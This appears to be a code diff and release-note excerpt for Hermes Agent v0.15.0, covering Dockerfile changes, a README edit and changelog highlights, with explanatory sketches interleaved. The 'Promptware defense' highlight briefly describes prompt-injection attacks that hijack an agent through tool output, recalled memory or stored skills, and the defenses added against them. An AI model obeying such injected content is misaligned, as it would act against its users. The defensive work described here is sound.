FROM node:22-bookworm-slim@sha256:7af03b14a13c8cdd38e45058fd957bf00a72bbe17feac43b1c15a689c029c732 AS node_source
FROM debian:13.4
# Disable Python stdout buffering to ensure logs are printed immediately
@@ -17,7 +25,7 @@ ENV PLAYWRIGHT_BROWSERS_PATH=/opt/hermes/.playwright
# hermes process, the dashboard, and per-profile gateways.
RUN apt-get update && \
apt-get install -y --no-install-recommends \
build-essential curl nodejs npm python3 ripgrep ffmpeg gcc python3-dev libffi-dev procps git openssh-client docker-cli xz-utils && \
ca-certificates curl python3 python-is-python3 ripgrep ffmpeg gcc python3-dev libffi-dev procps git openssh-client docker-cli xz-utils && \
rm -rf /var/lib/apt/lists/*
# ---------- s6-overlay install ----------
@@ -72,6 +80,18 @@ RUN useradd -u 10000 -m -d /opt/data hermes
COPY --chmod=0755 --from=uv_source /usr/local/bin/uv /usr/local/bin/uvx /usr/local/bin/
# Node 22 LTS: copy the node binary plus the bundled npm + corepack JS
# installs from the upstream image. npm and npx are recreated as symlinks
# because they're symlinks in the source image (and need to live on PATH).
# See node_source stage at the top of the file for the version-bump
# rationale (#4977).
COPY --chmod=0755 --from=node_source /usr/local/bin/node /usr/local/bin/
COPY --from=node_source /usr/local/lib/node_modules/npm /usr/local/lib/node_modules/npm
COPY --from=node_source /usr/local/lib/node_modules/corepack /usr/local/lib/node_modules/corepack
RUN ln -sf /usr/local/lib/node_modules/npm/bin/npm-cli.js /usr/local/bin/npm && \
ln -sf /usr/local/lib/node_modules/npm/bin/npx-cli.js /usr/local/bin/npx && \
ln -sf /usr/local/lib/node_modules/corepack/dist/corepack.js /usr/local/bin/corepack
WORKDIR /opt/hermes
# ---------- Layer-cached dependency install ----------
@@ -88,14 +108,15 @@ COPY ui-tui/package.json ui-tui/package-lock.json ui-tui/
COPY ui-tui/packages/hermes-ink/ ui-tui/packages/hermes-ink/
# `npm_config_install_links=false` forces npm to install `file:` deps as
# symlinks (the npm 10+ default) even on Debian's older bundled npm 9.x,
# which defaults to `install-links=true` and installs file deps as *copies*.
# The host-side package-lock.json is generated with a newer npm that uses
# symlinks, so an install-as-copy produces a hidden node_modules/.package-lock.json
# that permanently disagrees with the root lock on the @hermes/ink entry.
# That disagreement trips the TUI launcher's `_tui_need_npm_install()`
# check on every startup and triggers a runtime `npm install` that then
# fails with EACCES (node_modules/ is root-owned from build time).
# symlinks instead of copies. This is the default since npm 10+, which is
# what the image ships now (via the node:22 source stage). We set it
# explicitly anyway as defense-in-depth: the previous Debian-bundled npm
# 9.x defaulted to install-as-copy, which produced a hidden
# node_modules/.package-lock.json that permanently disagreed with the root
# lock on the @hermes/ink entry, tripped the TUI launcher's
# `_tui_need_npm_install()` check on every startup, and triggered a
# runtime `npm install` that then failed with EACCES. Keeping the env
# guards against a future regression if the source npm version changes.
ENV npm_config_install_links=false
RUN npm install --prefer-offline --no-audit && \
@@ -124,10 +145,14 @@ RUN npm install --prefer-offline --no-audit && \
# git), `[yc-bench]` (another git dep), and `[termux-all]` (Android
# redundancy), none of which belong in the published container.
#
# Provider packages (anthropic, bedrock, azure-identity) are included
# so Docker users can use these providers without requiring runtime
# lazy-install access to PyPI (often blocked in containerized envs).
#
# The editable link is created after the source copy below.
COPY pyproject.toml uv.lock ./
RUN touch ./README.md
RUN uv sync --frozen --no-install-project --extra all --extra messaging
RUN uv sync --frozen --no-install-project --extra all --extra messaging --extra anthropic --extra bedrock --extra azure-identity
# ---------- Source code ----------
# .dockerignore excludes node_modules, so the installs above survive.
@@ -162,6 +187,29 @@ RUN chmod -R a+rX /opt/hermes && \
# this a fast (~1s) egg-link creation with no resolution or downloads.
RUN uv pip install --no-cache-dir --no-deps -e "."
# ---------- Bake build-time git revision ----------
# .dockerignore excludes .git, so `git rev-parse HEAD` from inside the
# container always returns nothing — meaning `hermes dump` reports
# "(unknown)" and the startup banner drops its `· upstream <sha>` suffix.
# That makes support triage from container bug reports impossible:
# we can't tell which commit the user is actually running.
#
# Fix: write the commit SHA passed via the HERMES_GIT_SHA build-arg to
# /opt/hermes/.hermes_build_sha at build time, and have
# hermes_cli/build_info.py read it at runtime. Both `hermes dump` and
# banner.get_git_banner_state() try the baked SHA first, then fall back
# to live `git rev-parse` for source installs (unchanged behaviour).
#
# The arg is optional — local `docker build` without --build-arg simply
# omits the file, and the runtime falls back to live-git lookup. CI
# (.github/workflows/docker-publish.yml) passes ${{ github.sha }} so
# every published image has it.
ARG HERMES_GIT_SHA=
RUN if [ -n "${HERMES_GIT_SHA}" ]; then \
printf '%s\n' "${HERMES_GIT_SHA}" > /opt/hermes/.hermes_build_sha && \
chown hermes:hermes /opt/hermes/.hermes_build_sha; \
fi
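
The runtime half of this change (baked SHA first, live git second) might look roughly like the sketch below. It is not the contents of hermes_cli/build_info.py: `resolve_build_sha` is a hypothetical name, and only the file path and the fallback order are taken from the comment above.

```python
import subprocess
import tempfile
from pathlib import Path

# Path written by the Dockerfile RUN step when HERMES_GIT_SHA is provided.
BUILD_SHA_FILE = Path("/opt/hermes/.hermes_build_sha")


def resolve_build_sha(sha_file=BUILD_SHA_FILE, repo_dir="."):
    """Return the baked build SHA if present, else HEAD from git, else None."""
    try:
        baked = Path(sha_file).read_text(encoding="utf-8").strip()
    except OSError:
        baked = ""  # file absent: local build without --build-arg, or source install
    if baked:
        return baked
    try:
        result = subprocess.run(
            ["git", "rev-parse", "HEAD"],
            cwd=repo_dir, capture_output=True, text=True, check=False,
        )
    except OSError:
        return None  # git not installed, or repo_dir missing
    sha = result.stdout.strip()
    return sha if result.returncode == 0 and sha else None


# Simulate a published image by writing the file the Dockerfile would bake.
with tempfile.TemporaryDirectory() as tmp:
    sha_file = Path(tmp) / ".hermes_build_sha"
    sha_file.write_text("3b6347af15\n", encoding="utf-8")
    baked_sha = resolve_build_sha(sha_file)

print(baked_sha)
```

Reading the file before shelling out means a published image never needs a .git directory or a git binary on this path.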
# ---------- s6-overlay service wiring ----------
# Static services declared at build time: main-hermes + dashboard.
# Per-profile gateway services are registered dynamically at runtime by
@@ -179,7 +227,7 @@ COPY docker/s6-rc.d/ /etc/s6-overlay/s6-rc.d/
# slots from $HERMES_HOME/profiles/<name>/ after a container restart
# (the /run/service/ scandir is tmpfs and wiped on restart). Phase 4.
RUN mkdir -p /etc/cont-init.d && \
printf '#!/bin/sh\nexec /opt/hermes/docker/stage2-hook.sh\n' \
printf '#!/command/with-contenv sh\nexec /opt/hermes/docker/stage2-hook.sh\n' \
> /etc/cont-init.d/01-hermes-setup && \
chmod +x /etc/cont-init.d/01-hermes-setup
COPY --chmod=0755 docker/cont-init.d/015-supervise-perms /etc/cont-init.d/015-supervise-perms
@@ -188,13 +236,32 @@ COPY --chmod=0755 docker/cont-init.d/02-reconcile-profiles /etc/cont-init.d/02-r
# ---------- Runtime ----------
ENV HERMES_WEB_DIST=/opt/hermes/hermes_cli/web_dist
ENV HERMES_HOME=/opt/data
# `docker exec` privilege-drop shim. When operators run
# `docker exec <c> hermes ...` they default to root, and any file the
# command writes under $HERMES_HOME (auth.json, .env, config.yaml) ends
# up root-owned and unreadable to the supervised gateway (UID 10000).
# The shim lives at /opt/hermes/bin/hermes, sits earliest on PATH, and
# transparently re-exec's the real venv binary via `s6-setuidgid hermes`
# when invoked as root. Non-root callers (supervised processes,
# `--user hermes`, etc.) hit the short-circuit path with no overhead.
# Recursion is impossible because the shim exec's the venv binary by
# absolute path (/opt/hermes/.venv/bin/hermes). See the shim source for
# the opt-out env var (HERMES_DOCKER_EXEC_AS_ROOT=1).
COPY --chmod=0755 docker/hermes-exec-shim.sh /opt/hermes/bin/hermes
# Pre-s6 entrypoint.sh did `source .venv/bin/activate` which exported
# the venv bin onto PATH; Architecture B's main-wrapper.sh does the
# same for the container's main process, but `docker exec` and our
# cont-init.d scripts don't pass through the wrapper. Expose the venv
# bin globally so `docker exec <container> hermes ...` and any
# subprocess that doesn't activate the venv first still find hermes.
ENV PATH="/opt/hermes/.venv/bin:/opt/data/.local/bin:${PATH}"
#
# /opt/hermes/bin is prepended ahead of the venv so the privilege-drop
# shim wins PATH resolution. The shim's last act is to exec the venv
# binary by absolute path, so this PATH ordering is transparent to
# every other consumer.
ENV PATH="/opt/hermes/bin:/opt/hermes/.venv/bin:/opt/data/.local/bin:${PATH}"
RUN mkdir -p /opt/data
VOLUME [ "/opt/data" ]
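
The build-revision comments in the Dockerfile hunk above describe a two-step lookup: try the SHA baked into `/opt/hermes/.hermes_build_sha`, then fall back to a live `git rev-parse`. The contents of `hermes_cli/build_info.py` are not part of this diff, so the following is only a minimal sketch of that lookup order; the function names are hypothetical.

```python
import subprocess
from pathlib import Path
from typing import Optional

# Path taken from the Dockerfile comment; everything else here is illustrative.
BAKED_SHA_FILE = Path("/opt/hermes/.hermes_build_sha")


def read_baked_sha(path: Path = BAKED_SHA_FILE) -> Optional[str]:
    """Return the SHA written at image build time, or None if absent or empty."""
    try:
        sha = path.read_text(encoding="utf-8").strip()
    except OSError:
        return None
    return sha or None


def read_live_git_sha(repo_dir: Path) -> Optional[str]:
    """Ask git for HEAD; returns None when git or the repository is unavailable."""
    try:
        result = subprocess.run(
            ["git", "rev-parse", "HEAD"],
            cwd=repo_dir,
            capture_output=True,
            text=True,
            timeout=5,
            check=False,
        )
    except (OSError, subprocess.SubprocessError):
        return None
    sha = result.stdout.strip()
    return sha if result.returncode == 0 and sha else None


def resolve_build_sha(repo_dir: Path, baked: Path = BAKED_SHA_FILE) -> Optional[str]:
    """Baked SHA first (container images), then live git (source installs)."""
    return read_baked_sha(baked) or read_live_git_sha(repo_dir)
```

With this ordering, a local `docker build` without `--build-arg HERMES_GIT_SHA=...` simply finds no baked file and drops through to the git lookup, which matches the behaviour the comment describes.
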
+1 -1
@@ -22,7 +22,7 @@ Use any model you want — [Nous Portal](https://portal.nousresearch.com), [Open
<tr><td><b>A closed learning loop</b></td><td>Agent-curated memory with periodic nudges. Autonomous skill creation after complex tasks. Skills self-improve during use. FTS5 session search with LLM summarization for cross-session recall. <a href="https://github.com/plastic-labs/honcho">Honcho</a> dialectic user modeling. Compatible with the <a href="https://agentskills.io">agentskills.io</a> open standard.</td></tr>
<tr><td><b>Scheduled automations</b></td><td>Built-in cron scheduler with delivery to any platform. Daily reports, nightly backups, weekly audits — all in natural language, running unattended.</td></tr>
<tr><td><b>Delegates and parallelizes</b></td><td>Spawn isolated subagents for parallel workstreams. Write Python scripts that call tools via RPC, collapsing multi-step pipelines into zero-context-cost turns.</td></tr>
<tr><td><b>Runs anywhere, not just your laptop</b></td><td>Seven terminal backends — local, Docker, SSH, Singularity, Modal, Daytona, and Vercel Sandbox. Daytona and Modal offer serverless persistence — your agent's environment hibernates when idle and wakes on demand, costing nearly nothing between sessions. Run it on a $5 VPS or a GPU cluster.</td></tr>
<tr><td><b>Runs anywhere, not just your laptop</b></td><td>Six terminal backends — local, Docker, SSH, Singularity, Modal, and Daytona. Daytona and Modal offer serverless persistence — your agent's environment hibernates when idle and wakes on demand, costing nearly nothing between sessions. Run it on a $5 VPS or a GPU cluster.</td></tr>
<tr><td><b>Research-ready</b></td><td>Batch trajectory generation, trajectory compression for training the next generation of tool-calling models.</td></tr>
</table>
+651
@@ -0,0 +1,651 @@
# Hermes Agent v0.15.0 (v2026.5.28)
**Release Date:** May 28, 2026
**Since v0.14.0:** 1,302 commits · 747 merged PRs · 1,746 files changed · 282,712 insertions · 36,699 deletions · 560+ issues closed (15 P0, 65 P1, 19 security-tagged) · 321 community contributors (including co-authors)
> **The Velocity Release.** Hermes gets dramatically faster — to start, to run, to ship work, and to grow. The 16,083-line `run_agent.py` collapses to 3,821 (-76%) across 14 cohesive `agent/*` modules. Kanban grew into a real multi-agent platform across 104 PRs — orchestrator auto-decomposition, swarm topology, scheduled tasks, worktree-per-task, per-task model overrides. The cold-start perf wave keeps going: another second shaved off launch, 47% fewer per-conversation function calls, `hermes --version` flipping the head-to-head benchmark against Codex CLI. `session_search` is 4,500× faster and free now. Promptware defense lands against Brainworm-class attacks. Bitwarden Secrets Manager replaces N per-provider API keys with one bootstrap token. Skill bundles let one slash command load a whole workflow. The Ink TUI gets a multi-session orchestrator. Two new image_gen providers (Krea 2 Medium + Large, FAL ported to plugin), the Nous-approved MCP catalog with an interactive picker, an OpenHands orchestration skill, ntfy as the 23rd messaging platform, and a deep xAI integration round (Web Search plugin, xai-oauth `hermes proxy` upstream, retired-May-15 model detection + `hermes migrate xai`, natural TTS speech-tag pauses, base_url leak guard, OpenAI-style execution guidance for Grok). 15 P0 + 65 P1 closures alongside.
---
## ✨ Highlights
- **The Big Refactor — `run_agent.py` is no longer 16,000 lines** — The file at the heart of Hermes — the agent conversation loop — has been reduced from 16,083 lines to 3,821 (-76%), with the extracted code redistributed across 14 cohesive modules under `agent/`. Behavior is unchanged: every extraction keeps a thin forwarder on `AIAgent`, every test patch path still works, every external caller is compatible. The reason you care: future Hermes development moves faster, plugin authors can finally grep the codebase, and the file that took 90 seconds to load in your editor opens in a blink. ([#27248](https://github.com/NousResearch/hermes-agent/pull/27248))
- **Kanban grew into a real multi-agent platform — 104 PRs end to end** — Triage auto-decomposes one task into a tree of sub-tasks. `hermes kanban swarm` creates a full Swarm v1 graph in one command — root, parallel workers, gated verifier, gated synthesizer, shared blackboard. Tasks support per-task model overrides (cheap models for boilerplate, expensive ones for hard sub-tasks), board-level default workdirs, per-task worktree paths and branches, scheduled start times, configurable claim TTL, retry fingerprinting, stale-task detection, respawn guards, and a drag-to-delete trash zone. Workers report through `/workers/active`, `/runs/{id}`, and `/inspect` endpoints. ([#27572](https://github.com/NousResearch/hermes-agent/pull/27572), [#28443](https://github.com/NousResearch/hermes-agent/pull/28443), [#28364](https://github.com/NousResearch/hermes-agent/pull/28364), [#28394](https://github.com/NousResearch/hermes-agent/pull/28394), [#28462](https://github.com/NousResearch/hermes-agent/pull/28462), [#28384](https://github.com/NousResearch/hermes-agent/pull/28384), [#28467](https://github.com/NousResearch/hermes-agent/pull/28467), [#28455](https://github.com/NousResearch/hermes-agent/pull/28455), [#28452](https://github.com/NousResearch/hermes-agent/pull/28452), [#28432](https://github.com/NousResearch/hermes-agent/pull/28432), [#28468](https://github.com/NousResearch/hermes-agent/pull/28468), [#28420](https://github.com/NousResearch/hermes-agent/pull/28420))
- **Cold-start perf wave keeps going — another second saved, 47% fewer per-conversation function calls** — Three new optimization rounds: defer `openai._base_client` import (-240ms / -17MB on every CLI invocation), hot-path optimizations cut 47% of per-conversation function calls (399k → 213k for 31-turn chat), defer compression-feasibility check (-170 to -290ms on every agent construction), adaptive subprocess polling (-195ms per tool call, 1+ second per turn). Termux cold start drops from 2.9s to 0.8s. `hermes --version` cold drops 63% (701ms → 258ms), flipping the head-to-head benchmark against Codex CLI from 5/11 wins to 6/11. ([#28864](https://github.com/NousResearch/hermes-agent/pull/28864), [#28866](https://github.com/NousResearch/hermes-agent/pull/28866), [#28957](https://github.com/NousResearch/hermes-agent/pull/28957), [#29006](https://github.com/NousResearch/hermes-agent/pull/29006), [#29419](https://github.com/NousResearch/hermes-agent/pull/29419), [#30121](https://github.com/NousResearch/hermes-agent/pull/30121), [#30609](https://github.com/NousResearch/hermes-agent/pull/30609), [#31968](https://github.com/NousResearch/hermes-agent/pull/31968))
- **`session_search` rebuilt — no LLM, no cost, 4,500× faster** — The old `session_search` was an aux-LLM-powered tool that cost ~$0.30/call and took ~30 seconds to summarize three sessions, sometimes confabulating when the right session wasn't even in the FTS5 hit list. The new shape is one tool with three modes (discovery, scroll, browse) inferred from which args are set — no `mode` parameter, no aux-LLM, no config knob, no companion skill. Discovery is ~20ms instead of ~90s; scroll is ~1ms. Searching your past sessions for context is now free and instant. ([#27590](https://github.com/NousResearch/hermes-agent/pull/27590))
- **Promptware defense — Brainworm-class attacks blocked at three chokepoints** — Inspired by recent Brainworm / Promptware Kill Chain research (Origin HQ, arxiv 2601.09625), Hermes now defends the context window against prompt-injection attacks that try to hijack the agent via tool output, recalled memory, or stored skills. Single source of truth (`tools/threat_patterns.py`) with ~15 new Brainworm/C2 patterns; recalled memory is scanned at load time; tool results get delimiter markers so a malicious file or remote service can't impersonate Hermes' own system content. Paired with a new `security-guidance` plugin that pattern-matches dangerous code writes. ([#32269](https://github.com/NousResearch/hermes-agent/pull/32269), [#33131](https://github.com/NousResearch/hermes-agent/pull/33131), [#9151](https://github.com/NousResearch/hermes-agent/pull/9151))
- **Bitwarden Secrets Manager — one bootstrap token replaces every per-provider API key** — Stop keeping plaintext API keys in `~/.hermes/.env`. Install Bitwarden Secrets Manager (`bws` auto-installs lazily on first use), point Hermes at it with one bootstrap token (`BWS_ACCESS_TOKEN`), and every credential you need comes from Bitwarden at startup. Rotate a key in the Bitwarden web app and the rotation actually takes effect — Bitwarden defaults to source-of-truth so its values overwrite matching env vars on startup. Flip `secrets.bitwarden.override_existing: false` to invert. EU Cloud and self-hosted Bitwarden server URLs supported. Detected credentials are now labeled with their source so you can see at a glance which keys came from Bitwarden vs. the local env. ([#30035](https://github.com/NousResearch/hermes-agent/pull/30035), [#31378](https://github.com/NousResearch/hermes-agent/pull/31378), [#30364](https://github.com/NousResearch/hermes-agent/pull/30364))
- **ntfy as the 23rd messaging platform — push notifications without an account** — ntfy is the self-hostable push-notification service with no signup, no API key, just a topic URL. Hermes now adapts to it as a platform plugin (zero edits to core), so your agent can send you push notifications from any cron job, kanban task completion, or chat `send_message` — to your phone, your watch, your desktop, your homelab. (salvages [#30625](https://github.com/NousResearch/hermes-agent/pull/30625) → originally [#4043](https://github.com/NousResearch/hermes-agent/pull/4043)) ([#30867](https://github.com/NousResearch/hermes-agent/pull/30867))
- **Skill bundles — `/<name>` loads multiple skills at once** — A skill bundle is a named group of skills that load together with one slash command. Set up your "writing day" bundle (humanizer + ideation + obsidian + youtube-content) and `/writing-day` activates all four for the session. Skills Hub now has health checks, a freshness badge, and a watchdog cron. Three new optional skills land: `code-wiki` (Karpathy's LLM-Wiki, persistent indexed dev wiki), `openhands` (delegate to OpenHands for parallel coding agents), and `web-pentest` (OWASP-style web pentest recipes). ([#28373](https://github.com/NousResearch/hermes-agent/pull/28373), [#32345](https://github.com/NousResearch/hermes-agent/pull/32345), [#32240](https://github.com/NousResearch/hermes-agent/pull/32240), [#32261](https://github.com/NousResearch/hermes-agent/pull/32261), [#32265](https://github.com/NousResearch/hermes-agent/pull/32265))
- **TUI session orchestrator — multiple live sessions in one TUI window** — The Ink TUI gained an active-session switcher overlay. List, switch between, refresh, and close multiple live process-local sessions without leaving the TUI; dispatch a new session with a session-scoped model picker. Plus a wave of TUI polish — mouse-tracking DEC mode presets, scrollback preservation across branches and termux, slash-dropdown fixes, x.com link rendering, and CJK / IME input rendering improvements. (salvages [#27642](https://github.com/NousResearch/hermes-agent/pull/27642)) ([#32980](https://github.com/NousResearch/hermes-agent/pull/32980), [#30084](https://github.com/NousResearch/hermes-agent/pull/30084))
- **Two new image_gen providers — Krea 2 Medium + Large, FAL ported to plugin** — Krea joins the image_gen lineup as a built-in plugin: `Krea 2 Medium` ($0.03) and `Krea 2 Large` ($0.06), auto-discovered, selectable via `hermes tools` → Image Generation → Krea. Available through both the native Krea plugin and the FAL.ai catalog. The FAL.ai backend got pulled out of the monolithic image-generation tool into `plugins/image_gen/fal/`, completing the four-way architectural parity already established by web, browser, and video_gen — new image providers are now one file, not a fork. ([#33236](https://github.com/NousResearch/hermes-agent/pull/33236), [#30380](https://github.com/NousResearch/hermes-agent/pull/30380), [#33506](https://github.com/NousResearch/hermes-agent/pull/33506))
- **Nous-approved MCP catalog with interactive picker** — A curated catalog of Nous-vetted MCP servers, mirroring the optional-skills shape. Run `hermes mcp` and you get an interactive picker; install with one keystroke, credentials prompted at install time and written to `~/.hermes/.env`. Ships with the n8n manifest first. Closes the discovery gap that left users hunting GitHub for trusted MCP servers. ([#30870](https://github.com/NousResearch/hermes-agent/pull/30870))
- **OpenHands orchestration skill** — A new optional skill under `optional-skills/autonomous-ai-agents/openhands/` lets the agent delegate coding tasks to the OpenHands CLI alongside `claude-code`, `codex`, and `opencode`. OpenHands is the model-agnostic member of that family — any LiteLLM-supported provider works (OpenAI, Anthropic, OpenRouter, your own), so you can route a sub-task to the cheapest model that can finish it. Drop-in worker for kanban swarms and `/delegate` flows. (closes [#477](https://github.com/NousResearch/hermes-agent/issues/477)) ([#32261](https://github.com/NousResearch/hermes-agent/pull/32261))
- **Deep xAI integration round — Web Search plugin, OAuth proxy upstream, May 15 retirement detection, natural TTS, security hardening** — Six interlocking xAI improvements:
- **xAI Web Search** lands as a `plugins/web/xai/` provider, slots alongside Brave / Tavily / Exa / SearXNG / DDGS / Firecrawl — reuses your existing Grok OAuth or `XAI_API_KEY` credentials, no new env vars. ([#29042](https://github.com/NousResearch/hermes-agent/pull/29042))
- **`hermes proxy` gains an xAI upstream** — your local OpenAI-compatible endpoint can now be backed by SuperGrok OAuth, no PKCE-refresh code to write in your client. ([#28356](https://github.com/NousResearch/hermes-agent/pull/28356))
- **May 15 model retirement detection** — `grok-4`, `grok-4-fast{,-reasoning,-non-reasoning}`, `grok-3`, `grok-code-fast-1`, `grok-imagine-image-pro` etc. are detected in doctor and at chat startup, and `hermes migrate xai` performs a one-shot config migration to the supported model. No more silent 404s after the retirement date. ([#29277](https://github.com/NousResearch/hermes-agent/pull/29277))
- **Opt-in `auto_speech_tags`** for xAI TTS — inserts light `[pause]` tags between paragraphs and sentences for more natural-sounding voice replies. Default OFF. ([#29376](https://github.com/NousResearch/hermes-agent/pull/29376))
- **`xai-oauth` `base_url` pinned to `x.ai` origin** — closes a silent credential-leak vector where `XAI_BASE_URL` could repoint OAuth-authenticated inference to an attacker-controlled host. ([#28952](https://github.com/NousResearch/hermes-agent/pull/28952))
- **OpenAI-style execution guidance applied to Grok models** — Grok and xai-oauth now get the same family-specific execution discipline block GPT/Codex have, so the model stops claiming completion without tool calls and stops suggesting workarounds instead of using existing tools. ([#27797](https://github.com/NousResearch/hermes-agent/pull/27797))
- Plus `x_search` degraded-results surfacing, tier-gated 403 with API-key fallback, PKCE `code_challenge` round-trip fix, dead-token quarantine on terminal refresh failure, MiniMax-style per-request short-token refresh, and honoring `WKE=unauthenticated` at both classifier sites. ([#29484](https://github.com/NousResearch/hermes-agent/pull/29484), [#28351](https://github.com/NousResearch/hermes-agent/pull/28351), [#27560](https://github.com/NousResearch/hermes-agent/pull/27560), [#28116](https://github.com/NousResearch/hermes-agent/pull/28116), [#30619](https://github.com/NousResearch/hermes-agent/pull/30619), [#30872](https://github.com/NousResearch/hermes-agent/pull/30872))
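
The `xai-oauth` `base_url` guard in the list above pins OAuth-authenticated requests to the `x.ai` origin. The exact check in #28952 is not shown here, so this is only a sketch of one way such a pin could work. The helper names, the HTTPS requirement, the subdomain rule, and the default URL are all assumptions.

```python
from typing import Optional
from urllib.parse import urlsplit

ALLOWED_HOST = "x.ai"  # origin named in the release note
DEFAULT_BASE_URL = "https://api.x.ai/v1"  # assumed default, for illustration only


def is_xai_origin(base_url: str) -> bool:
    """True only for https URLs whose host is x.ai or a subdomain of it."""
    try:
        parts = urlsplit(base_url)
        host = (parts.hostname or "").lower()
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    if parts.scheme != "https":
        return False
    return host == ALLOWED_HOST or host.endswith("." + ALLOWED_HOST)


def pick_oauth_base_url(configured: Optional[str]) -> str:
    """Ignore an override (such as XAI_BASE_URL) that points off-origin."""
    if configured and is_xai_origin(configured):
        return configured
    return DEFAULT_BASE_URL
```
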
---
## 🏗️ Core Agent & Architecture
### The Big Refactor — `run_agent.py` 16k → 3.8k
- `run_agent.py` from 16,083 → 3,821 lines (-76%), extracted into 14 cohesive `agent/*` modules. `run_conversation` alone was 3,877 lines before the refactor. Every extraction keeps a thin forwarder on `AIAgent`, every test-patch path is preserved, every external caller stays compatible. ([#27248](https://github.com/NousResearch/hermes-agent/pull/27248))
### Agent loop & conversation
- Auxiliary task layered fallback (primary → chain → main agent → graceful fail) on capacity errors (402/429/connection). (salvages [#26811](https://github.com/NousResearch/hermes-agent/pull/26811) + [#26998](https://github.com/NousResearch/hermes-agent/pull/26998)) ([#27625](https://github.com/NousResearch/hermes-agent/pull/27625))
- Buffer retry/fallback status; surface only on terminal failure (no more noisy "retrying..." spam in mid-run output). ([#33816](https://github.com/NousResearch/hermes-agent/pull/33816))
- Host contract for external context engines — condenses 5 prior PRs into one extension surface. ([#33750](https://github.com/NousResearch/hermes-agent/pull/33750))
- Fallback immediately on provider content-policy blocks. ([#33883](https://github.com/NousResearch/hermes-agent/pull/33883))
- Re-pad `reasoning_content` on cross-provider fallback to require-side providers. (salvage [#33784](https://github.com/NousResearch/hermes-agent/pull/33784)) ([#33795](https://github.com/NousResearch/hermes-agent/pull/33795))
- Per-turn tool-outcome verifier — patch tool gets indent preservation, CRLF preservation, per-file failure escalation. ([#32273](https://github.com/NousResearch/hermes-agent/pull/32273))
- Single-knob native vision for custom-provider models. ([#29679](https://github.com/NousResearch/hermes-agent/pull/29679))
- Background review fork isolated from external memory plugins. ([#27190](https://github.com/NousResearch/hermes-agent/pull/27190))
- Background review inherits parent toolset config for `tools[]` cache parity. ([#29704](https://github.com/NousResearch/hermes-agent/pull/29704))
- Recover from providers returning list-type tool content. ([#30259](https://github.com/NousResearch/hermes-agent/pull/30259))
- Treat partial-stream stub responses as length truncation rather than clean stop. ([#30998](https://github.com/NousResearch/hermes-agent/pull/30998))
- OpenAI execution guidance applied to xAI Grok / xai-oauth. ([#27797](https://github.com/NousResearch/hermes-agent/pull/27797))
- ContextVars propagate to concurrent tool worker threads.
- Preload `jiter` native parser. ([#33692](https://github.com/NousResearch/hermes-agent/pull/33692))
- Expose context engine tools with saved toolsets. (salvage of [#31194](https://github.com/NousResearch/hermes-agent/pull/31194)) ([#33719](https://github.com/NousResearch/hermes-agent/pull/33719))
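
The layered auxiliary fallback in the list above (primary → chain → main agent → graceful fail) can be pictured as an ordered walk over providers that only advances on capacity errors. This is a minimal sketch under that reading; `CapacityError` and `run_with_fallback` are hypothetical names, not Hermes APIs.

```python
from typing import Callable, Optional, Sequence

Provider = Callable[[str], str]


class CapacityError(Exception):
    """Hypothetical stand-in for a 402, 429, or connection failure."""


def run_with_fallback(
    task: str,
    primary: Provider,
    chain: Sequence[Provider],
    main_agent: Provider,
) -> Optional[str]:
    """Try each layer in order; move on only when a layer is out of capacity."""
    for provider in [primary, *chain, main_agent]:
        try:
            return provider(task)
        except CapacityError:
            continue  # next layer
    return None  # graceful fail: the caller decides how to degrade
```

Any other exception type propagates unchanged, so genuine bugs are not masked by the fallback walk.
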
### Sessions & memory
- `session_search` rebuilt — single-shape (discovery + scroll + browse), no aux-LLM, ~20ms vs. ~90s. ([#27590](https://github.com/NousResearch/hermes-agent/pull/27590))
- Opt-in JSON snapshot writer for sessions. (salvage of [#29182](https://github.com/NousResearch/hermes-agent/pull/29182)) ([#29278](https://github.com/NousResearch/hermes-agent/pull/29278))
- Persist `platform_message_id` for recall across gateway restarts. ([#29449](https://github.com/NousResearch/hermes-agent/pull/29449))
- Inline memory-context mentions stay visible in conversation. ([#28132](https://github.com/NousResearch/hermes-agent/pull/28132))
- Recalled memory labeled informational, not authoritative. ([#28583](https://github.com/NousResearch/hermes-agent/pull/28583))
- Memory + context-engine tool injection gated on `enabled_toolsets`. ([#30177](https://github.com/NousResearch/hermes-agent/pull/30177))
- Guard against external drift in `MEMORY.md` / `USER.md`. ([#30877](https://github.com/NousResearch/hermes-agent/pull/30877))
- Honcho runtime peer mapping — correctness follow-ups + setup wizard + docs. ([#30077](https://github.com/NousResearch/hermes-agent/pull/30077))
- Periodic memory logging for leak detection. (salvage of [#17667](https://github.com/NousResearch/hermes-agent/pull/17667)) ([#27102](https://github.com/NousResearch/hermes-agent/pull/27102))
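
The rebuilt `session_search` is described as one tool whose mode (discovery, scroll, browse) is inferred from which arguments are set. The real argument names are not given in these notes, so the sketch below uses hypothetical `query` and `session_id` parameters purely to illustrate argument-driven dispatch without a `mode` parameter.

```python
from typing import Optional


def infer_mode(query: Optional[str] = None, session_id: Optional[str] = None) -> str:
    """Pick a mode from the arguments present (argument names are assumptions)."""
    if session_id:
        return "scroll"     # a specific session was named: page through it
    if query:
        return "discovery"  # free-text search across sessions
    return "browse"         # nothing given: list sessions
```
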
### Codex / Responses-API maturation
- TTFB watchdog for stalled Codex Responses streams. ([#32042](https://github.com/NousResearch/hermes-agent/pull/32042))
- Actionable hint when stale-call detector fires on known silent-reject pattern. ([#32016](https://github.com/NousResearch/hermes-agent/pull/32016), [#33133](https://github.com/NousResearch/hermes-agent/pull/33133))
- Drop SDK `responses.stream()` helper; consume events directly. ([#33042](https://github.com/NousResearch/hermes-agent/pull/33042))
- Gracefully recover from `invalid_encrypted_content`. (salvage of [#10144](https://github.com/NousResearch/hermes-agent/pull/10144)) ([#33035](https://github.com/NousResearch/hermes-agent/pull/33035))
- Recover Codex Responses streams with null output. ([#32963](https://github.com/NousResearch/hermes-agent/pull/32963), [#33390](https://github.com/NousResearch/hermes-agent/pull/33390))
- Drop foreign-issuer reasoning and transient `rs_tmp` reasoning replay state. ([#33156](https://github.com/NousResearch/hermes-agent/pull/33156), [#33146](https://github.com/NousResearch/hermes-agent/pull/33146))
- Codex 429 quota classified as rate-limit, not missing credentials. ([#33168](https://github.com/NousResearch/hermes-agent/pull/33168))
- Codex chat path falls back to credential_pool when singleton is empty. ([#33189](https://github.com/NousResearch/hermes-agent/pull/33189))
- Codex re-auth syncs credential_pool. ([#33164](https://github.com/NousResearch/hermes-agent/pull/33164))
- Omit `tools` key when no tools registered. ([#33409](https://github.com/NousResearch/hermes-agent/pull/33409))
- Parse Codex image-generation SSE directly. ([#32933](https://github.com/NousResearch/hermes-agent/pull/32933))
---
